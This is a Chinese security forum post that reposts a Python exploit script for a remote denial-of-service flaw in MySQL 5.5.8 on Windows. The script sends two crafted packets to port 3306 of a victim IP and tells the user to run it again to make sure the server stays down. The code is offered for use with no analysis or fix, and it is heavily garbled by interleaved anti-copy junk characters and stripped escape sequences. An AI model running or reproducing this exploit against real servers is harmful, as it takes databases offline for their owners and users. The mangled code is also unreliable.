最近看过此主题的会员

返回列表 发帖
MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys
6 F; T+ O% @% D4 [- |
' q8 X/ E8 ~7 y. N- @/ xprint "& E3 t1 l$ W: u( @! n" {
"
( H! m1 R. H- g: t# p: G3 Hprint "----------------------------------------------------------------"
/ U' G8 W" B: o5 n/ j- e/ nprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
# Q& |& J& P2 ~) o* o1 {  zprint "| Level Smash the Stack                                         |"( a8 n: p" j4 o% s: D2 g' Z
print "----------------------------------------------------------------"
/ \! `: ~0 X- S3 C$ ]9 |# Hprint "
" V4 X5 ]* I; c: ^( B"
1 x3 a; {, Q: f' R" N" u2 u0 d
5 q/ ]' \5 |: obuf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"" ~" w& R& v$ d. ~( c
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
1 W7 ]' j1 J) ?
6 C+ u/ y: ~, {& m/ tbuf2=("x11x00x00x00x03set autocommit30"), ~, U$ [7 z6 G& a" h  V

' o9 Y3 f3 r3 [5 v9 i+ Hdef usage():
$ P: T8 X6 ]% ~* v+ S' ?print "usage : ./mysql.py <victim_ip>"
) T; f8 V* Y8 U+ m1 a8 W5 Bprint "example: ./mysql.py 192.168.1.22"
7 z2 c5 y* m/ e  q7 ]% U! q+ h+ d
0 u" U/ ^9 E* c2 t# f" z, b- `+ [' Z
6 P2 ~5 R+ T" ldef main():& U0 K8 }& h- ?8 }" q( {6 ~
if len(sys.argv) != 2:
3 u8 U- [2 b9 p% V/ \usage()# [& v; E  b, c! X% _# [( V! r& E
sys.exit()' L9 V% `8 i5 n+ @
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)$ d# l+ {  l3 }
' p5 _0 q# N: T, A1 a
HOST = sys.argv[1]: p- T# H/ w# d' _. c
PORT = int(3306)
1 ^; M: x1 Q1 X3 O# qs.connect((HOST,PORT))5 b% u2 `1 S+ h
print "
  • Connect"
    6 ~* n' [0 c4 o6 Ds.send(buf)
    3 Z/ N4 p" l% _0 N. Bprint "
  • Payload 1 sent"! ]& ]& k! C  G* f" B
    s.send(buf2)$ U$ x2 a' Q& w' Z) y
    print "
  • Payload 2 sent
    $ t3 e4 o1 C4 m2 a2 l+ o", "
  • Run again to ensure it is down..) X! x4 z0 p( d, T$ d, v
    "" U1 z3 M) l1 ?/ E
    s.close()
    8 N9 N- d: f- _) y
    4 w0 B8 T8 y, W; e) t" ~# n; }8 sif __name__ == "__main__":
    1 z" n  _: @6 E/ ^: Jmain()/ h! j+ Q- r  c: ^; I

    9 E( F2 l* d2 T, y% n) z" b& i' {0 q, H

    ) Q0 A: V7 M2 [
    - I2 R$ _4 T! Y% j
    " c" r+ R9 y: A7 |, t: l, S
    ' ]8 Y2 S# R+ ~# r+ f+ V
    * F8 r. g9 Y8 ^$ t7 Y/ T) f) P. _4 G, L; C5 o, t- J

    : t; O. G) N' h) y6 I/ I
    2 a$ t6 z& Y* F/ `2 P  M5 X/ [( }5 B- K7 D& e
    6 P2 I; z; i3 K' v8 s8 k

    - N' F! ]% g5 s3 B% J  A/ T& J3 x: p) i) o
    ' \) G# ^  k$ b& U
    2 ?5 s/ u: _- e7 Y4 \
    7 t  O, u! X0 Z& i- |
    & O1 ^7 b8 i5 @1 t
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  •  

    您可能还想看的主题:

    启明星辰招聘

    TOP

    返回列表